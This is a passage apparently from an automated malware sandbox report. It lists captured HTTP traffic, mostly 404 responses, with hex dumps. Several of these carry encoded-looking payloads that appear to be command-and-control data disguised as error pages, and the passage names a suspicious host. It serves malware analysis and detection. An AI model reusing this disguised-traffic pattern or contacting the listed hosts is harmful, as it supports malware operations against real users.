                          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:04 GMTContent-Type: text/htmlContent-Length: 153Connection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Fri, 14 Jan 2022 03:59:42 GMTContent-Type: text/plain; charset=utf-8Content-Length: 10Connection: closeRetry-After: Fri, 14 Jan 2022 04:59:44 GMTX-Content-Type-Options: nosniffX-Made-With: <3 by DutchCodersX-Ratelimit-Key: 127.0.0.1,84.17.52.18,84.17.52.18X-Ratelimit-Limit: 10X-Ratelimit-Rate: 600X-Ratelimit-Remaining: 9X-Ratelimit-Reset: 1642132784X-Served-By: Proudly served by DutchCoders
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:58:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1c b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:58:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:58:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:58:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Jan 2022 03:57:44 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 03:59:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 